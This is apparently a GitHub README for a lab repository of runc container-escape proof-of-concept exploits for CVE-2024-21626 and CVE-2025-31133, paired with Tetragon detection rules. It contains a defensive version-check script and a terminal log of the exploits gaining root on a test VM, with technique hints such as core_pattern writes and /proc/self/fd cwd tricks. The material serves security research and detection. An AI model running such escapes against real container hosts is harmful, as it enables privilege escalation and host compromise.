scherepiuk/container-escape-ebpf
GitHub: scherepiuk/container-escape-ebpf
Provides exploit code for the two runc container escape vulnerabilities CVE-2024-21626 and CVE-2025-31133, together with Tetragon detection rules.
Stars: 1 | Forks: 0
# Prerequisites
- The host runs a vulnerable runc version:
  - For [CVE-2025-31133](https://www.cve.org/CVERecord?id=CVE-2025-31133): `1.2.7` and earlier, `1.3.0-rc.1` through `1.3.2`, `1.4.0-rc.1` and `1.4.0-rc.2`.
  - For [CVE-2024-21626](https://www.cve.org/CVERecord?id=CVE-2024-21626): `1.0.0-rc93` through `1.1.11`.
- An unprivileged user can create containers with `runc` (or containerd's `ctr`) from an OCI config file and a plain rootfs.
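As an added inventory check (not part of this repository), the snippet below maps a `runc --version` string onto the affected ranges listed above, including the rc ordering (`1.3.0-rc.1` sorts before `1.3.0`). It assumes the first line of `runc --version` reads `runc version X.Y.Z`; a distro build that backports the fix without bumping the version will still be flagged, so treat a hit as a prompt to verify, not as proof.

```python
import re

# Affected ranges exactly as the prerequisites above state them:
# (cve, lowest affected or None for "and earlier", highest affected), inclusive.
AFFECTED = [
    ("CVE-2024-21626", "1.0.0-rc93", "1.1.11"),
    ("CVE-2025-31133", None, "1.2.7"),
    ("CVE-2025-31133", "1.3.0-rc.1", "1.3.2"),
    ("CVE-2025-31133", "1.4.0-rc.1", "1.4.0-rc.2"),
]

# Leading X.Y.Z with an optional -rcN / -rc.N; anything after it (e.g. a distro
# suffix such as "-0ubuntu1") is ignored, which errs on the side of flagging.
_VER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-rc\.?(\d+))?")


def parse_version(text):
    """Turn '1.3.0-rc.1' into a sortable tuple; a final release sorts after
    every rc of the same X.Y.Z, so 1.3.0-rc.1 < 1.3.0 < 1.3.1."""
    m = _VER.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised runc version: {text!r}")
    major, minor, patch, rc = m.groups()
    tail = (0, int(rc)) if rc is not None else (1, 0)
    return (int(major), int(minor), int(patch)) + tail


def affected_cves(version):
    """Return the CVEs whose stated range contains `version`, in AFFECTED order."""
    v = parse_version(version)
    hits = []
    for cve, low, high in AFFECTED:
        in_range = (low is None or parse_version(low) <= v) and v <= parse_version(high)
        if in_range and cve not in hits:
            hits.append(cve)
    return hits


def version_from_runc_output(output):
    """Extract the version from `runc --version` output, whose first line is
    assumed to read 'runc version X.Y.Z'."""
    m = re.search(r"^runc version (\S+)", output, re.MULTILINE)
    if not m:
        raise ValueError("no 'runc version' line in output")
    return m.group(1)


# Constructed sample of `runc --version` output so the check runs offline.
SAMPLE_OUTPUT = "runc version 1.1.11\ncommit: (constructed sample)\nspec: 1.0.2-dev\n"

if __name__ == "__main__":
    v = version_from_runc_output(SAMPLE_OUTPUT)
    print(v, "->", affected_cves(v) or "not in a listed range")
```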
# Usage
```
you@local:container-escape-ebpf$ make deploy # Setup `aws` CLI with `aws configure` and `terraform/terraform.tfvars` prior to deploying.
you@local:container-escape-ebpf$ make ssh # Wait around a minute for the virtual machine to initialize before SSHing.
ubuntu@vm:~$ python3 /pocs/cve-2024-21626.py
Launched container: 4bvviH3spAXYLNJpoQ7YHlg366eG1mhB
ubuntu@vm:~$ ls -la /pwned_by_cve_2024_21626
-rw-r--r-- 1 root root 0 Jan 13 13:49 /pwned_by_cve_2024_21626
ubuntu@vm:~$ python3 /pocs/cve-2025-31133.py
Launched container: aeE5aI7Q7aYasXTAy64QKdAIlKMSe19p
sh: 1: cannot create /proc/sys/kernel/core_pattern: Read-only file system
Exploit did not succeed. Retrying...
Launched container: vg4fRLcB87DWxGRGb1lb8mXaIum7mEfQ
sh: 1: cannot create /proc/sys/kernel/core_pattern: Read-only file system
Exploit did not succeed. Retrying...
Launched container: NsaQgj5PYt1qlBmkWtvWJ6R5ZondCjHH
Exploit succeeded!
ubuntu@vm:~$ ls -la /pwned_by_cve_2025_31133
-rw-r--r-- 1 root root 0 Jan 13 13:52 /pwned_by_cve_2025_31133
ubuntu@vm:~$ /utils/reset.sh
ubuntu@vm:~$ sudo systemctl start tetragon
ubuntu@vm:~$ python3 /pocs/cve-2024-21626.py
runc run failed: unable to start container process: chdir to cwd ("/proc/self/fd/7") set in config.json failed: permission denied
Launched container: Y7VcaVHuPbYoeqERcfFjjQLJxMEo1VPV
ubuntu@vm:~$ python3 /pocs/cve-2025-31133.py
Launched container: uJdkfzL0feIm6ipPv0PazSUPW6VJ765h
sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied
Exploit did not succeed. Retrying...
Launched container: qGKTlsyZ0Hh47DxF1rUIjkBxffLfYUxx
sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied
Exploit did not succeed. Retrying...
Launched container: jMrn2W3NLAap6UPA2UB6LQHLLu9yevcO
sh: 1: cannot create /proc/sys/kernel/core_pattern: Permission denied
bash-5.1# exit
exit
ubuntu@vm:~$ exit
exit
you@local:container-escape-ebpf$ make teardown # Don't forget to teardown resources!
```